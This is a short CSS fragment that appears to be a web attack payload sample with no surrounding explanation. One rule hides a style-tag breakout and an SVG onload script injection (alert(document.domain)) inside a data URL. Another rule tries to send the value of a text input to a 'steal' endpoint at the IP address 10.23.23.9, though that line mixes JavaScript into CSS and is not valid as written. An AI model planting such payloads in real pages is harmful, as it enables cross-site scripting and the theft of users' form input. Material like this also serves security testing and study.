background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
input[type="text"] {
  background-image: url('https://10.23.23.9/steal?value='+document.querySelector('input').value);
}
